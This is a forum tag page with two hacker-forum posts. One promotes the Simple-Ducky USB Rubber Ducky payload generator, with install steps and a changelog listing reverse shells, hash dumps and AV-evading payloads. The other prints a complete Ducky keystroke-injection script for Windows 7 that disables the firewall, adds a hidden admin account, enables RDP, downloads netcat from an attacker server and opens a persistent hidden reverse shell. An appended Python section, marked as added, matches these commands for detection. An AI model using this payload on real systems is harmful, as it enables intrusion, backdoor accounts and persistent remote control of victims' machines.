Showing results for tags 'Simple-Ducky'.
Hello,

In lieu of usbrubberducky.com being down I decided to create the Simple-Ducky Payload Generator. The simple-ducky is designed to quickly create reliable payloads and launch listeners. The Simple-Ducky currently uses version 2.6 of the duck encoder. The latest version of the Simple-Ducky supports all Debian Linux distros (i.e. Kali-Linux, Ubuntu, Linux Mint etc). The smart installer will take care of all the work for you.

With the simple-ducky in a matter of seconds you can:

* Create your evil executable (it's automatically placed in your web directory)
* Create your inject.bin
* Launch a listener (meterpreter or netcat)
* Generate custom password lists
* Crack extracted passwords
* And so much more...

Note: This framework was designed to work with Kali Linux out of the box (JDK update is required and included with the simple-ducky). However, it should work with other Linux distros as long as you install the required dependencies (see the wiki page for other than Kali installs).

Installation

Installing the simple-ducky just got even easier. Just download the install script, then copy and paste the lines below into your terminal. The install script now supports all Debian based Linux distros. Install videos are available on the Google code page: https://code.google.com/p/simple-ducky-payload-generator/

There are now two options to install the simple ducky....

Download the install file: https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.1_debian.sh&can=2&q=

root@kali:~# chmod +x installer_v1.1.1_debian.sh
root@kali:~# ./installer_v1.1.1_debian.sh
root@kali:~# rm installer_v1.1.1_debian.sh

To run the program:

root@kali:~# simple-ducky

Change Log

v1.1.1 Changes
1. Added tons of new features; Shells with dbd (incredibly powerful, see video below) and the Custom Payload Builder
2. Cleaned up menu options, dependencies, and processes
3. Made bug fixes to several payloads
4. Replaced Netcat with Ncat

v1.1.0 Changes
1. Upgraded the encoder to version 2.6
2. Made changes to the main menu
3. Added a new payload: LM/NTLM Hash Dump from a Live System
4. Added a new function: LM/NTLM Password Hasher
5. Added a new tool: Site2lst Custom Wordlist Builder
6. Upgraded the installer: Now there is just one version of the Simple-Ducky that supports all Debian distros (Tested on: Kali-Linux, Ubuntu and Linux Mint)

v1.0.9 Changes
1. Added a new payload subset titled "Forced Phishing & Web Attacks"
2. Integrated: SE-Toolkit, Metasploit's Browser_Autopwn, and BurpSuite.
3. Added Payload: Local DNS Poisoning | SE-Toolkit Java Applet Attack
4. Added Payload: Local DNS Poisoning | Metasploit's Browser_Autopwn
5. Added Payload: Proxy in the Middle (PiTM) | No Admin Access Needed | Burpsuite

v1.0.8 Changes
1. Added OSX Single User Mode Reverse Shell Payload
2. Made minor scripting changes
3. Changed Encoder to version 2.5
4. Fixed bugs in the FTP Server Setup option
5. Created a User add function for the FTP Server Setup Option

v1.0.7 Changes
1. Fixed command line entrance method on all Windows Vista/7 Payloads w/o UAC (Props to arzen)

v1.0.6 Changes
1. Created two separate versions of the simple-ducky (One for Kali-Linux and the other for Other Linux Distros)
   * The purpose for the Kali-Edition is to follow the Debian compliance that Offensive-Security established in hopes of getting the Simple-Ducky prepacked in Kali-Linux. (Fingers-Crossed)
2. Removed the install dependencies option on the Kali-Linux version (Kali will keep these up to date) (Other-Linux version still has it)
3. Updated the Powershell Download & Execute Payloads to provide better obfuscation (tested on fully patched Windows Vista/7/8 running McAfee)
4. Added a new function that configures the Pure-FTPD server for the user

v1.0.5 Changes
1. Complete Payload and Menu Revamp

v1.0.4 Changes
1. Added ~Persistence~ Payload
2. Updated Menu Options

v1.0.3 Changes
1. Payload Update
2. Added 64bit JDK Update Support
3. Added initial delay function (allows you to set a custom delay for driver install time).
4. Changed encoder version from 2.4 to 3.0

v1.0.2 Changes
1. International keyboard mapping added. -- Testers would be greatly appreciated.
2. Aesthetic changes to text.

v1.0.1 Changes
1. Payload Update
2. Encoder downgraded from v3.0 to v2.4 due to issues encoding the Win 7 Reverse Shell payload.

Custom Payload Builder and DBD... Watch as we get NT\SYSTEM level privs while evading AV!

Thanks for checking out the Simple-Ducky. Please provide any feedback and bug fixes to firstname.lastname@example.org

~skysploit

Hello,

Here's a new payload that I came up with. It targets Windows 7 w/UAC enabled. Here's what happens when you run it...

* Opens an admin command prompt
* Creates an admin user (default creds: hacker | mysecretpassword)
* Disables the Windows firewall
* Enables remote desktop
* Enables remote assistance
* Hides the newly created admin account from the Windows Welcome Screen
* Creates a VBScript to run a hidden instance of Netcat
* Creates a batch file to launch Netcat (this is needed to mask an open netcat session from the desktop)
* Downloads netcat from the attacker's web server (to transfer netcat to the web directory in kali use: cp /usr/share/windows-binaries/nc.exe /var/www/nc.exe) (launch apache by using: service apache2 start)
* Calls the VBScript to launch the hidden netcat shell
* Creates a batch file in the startup directory that will launch the VBScript every time a user logs in (the batch file is hidden/transparent to the user while it runs)

So here it is... I will add a fully configurable version of ~Persistence~ to the Simple-Ducky Payload Generator this weekend.

~skysploit

DELAY 5000
ESCAPE
DELAY 300
CONTROL ESCAPE
DELAY 300
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
DELAY 300
ENTER
DELAY 800
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING net user hacker mysecretpassword /add && net localgroup administrators hacker /add
ENTER
DELAY 200
STRING y
ENTER
DELAY 400
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING copy con nc.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.Run chr(34) & "c:\Windows\System32\nc.bat" & Chr(34), 0, false
ENTER
STRING Set WshShell = Nothing
ENTER
CTRL z
ENTER
STRING echo cmdow @ /hid >> nc.bat
ENTER
STRING echo nc -nv 172.16.1.5 4444 -e cmd.exe >> nc.bat
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.1.5/nc.exe,c:\Windows\system32\nc.exe');
ENTER
STRING cscript nc.vbs
ENTER
STRING cd c:\Documents And Settings\All Users\Start Menu\Programs\Startup\
ENTER
STRING echo cmdow @ /hid >> persistence.bat
ENTER
STRING echo cscript c:\Windows\System32\nc.vbs >> persistence.bat
ENTER
STRING exit
ENTER
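
A detection-side view of the command sequence in the post above, as an added example that is not part of the original post or of the Simple-Ducky project: it matches process command lines against rules derived from the typed commands and alerts when several fire on one host within a short window. The event tuple format, host names, window and threshold are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Rules derived from the commands the payload types (see the post above).
RULES = {
    "firewall_disabled": r"netsh\s+firewall\s+set\s+opmode\s+disable",
    "local_user_added": r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b",
    "admin_group_add": r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b",
    "rdp_enabled": r"\breg(\.exe)?\s+add\s.*fDenyTSConnections.*/d\s+0\b",
    "remote_assist_enabled": r"\breg(\.exe)?\s+add\s.*fAllowToGetHelp.*/d\s+1\b",
    "account_hidden": r"\breg(\.exe)?\s+add\s.*Winlogon\\SpecialAccounts\\UserList.*/d\s+0\b",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}

def match_rules(cmdline):
    """Return the names of all rules that match one process command line."""
    return {name for name, rx in COMPILED.items() if rx.search(cmdline)}

def detect_bursts(events, window=120, threshold=3):
    """Map host -> sorted rule names when at least `threshold` distinct
    rules fire on that host within `window` seconds."""
    hits = defaultdict(list)
    for ts, host, cmdline in events:
        hits[host].extend((ts, rule) for rule in match_rules(cmdline))
    alerts = {}
    for host, seq in hits.items():
        seq.sort()
        for i, (start, _) in enumerate(seq):
            fired = {rule for ts, rule in seq[i:] if ts - start <= window}
            if len(fired) >= threshold:
                alerts[host] = sorted(fired)
                break
    return alerts

# Constructed events: (epoch seconds, host, command line). Not real logs.
TS = r'"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"'
UL = r'"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"'
SAMPLE_EVENTS = [
    (1000, "WS-014", "netsh firewall set opmode disable"),
    (1001, "WS-014", "net user hacker mysecretpassword /add"),
    (1001, "WS-014", "net localgroup administrators hacker /add"),
    (1003, "WS-014", f"reg add {TS} /v fDenyTSConnections /t REG_DWORD /d 0 /f"),
    (1004, "WS-014", f"reg add {UL} /v hacker /t REG_DWORD /d 0 /f"),
    # A lone RDP change on another host stays below the threshold.
    (5000, "WS-022", f"reg add {TS} /v fDenyTSConnections /t REG_DWORD /d 0 /f"),
]

if __name__ == "__main__":
    print(detect_bursts(SAMPLE_EVENTS))
```

Scoring on the number of distinct rules rather than on any single command keeps routine administration, such as one RDP change, from alerting on its own.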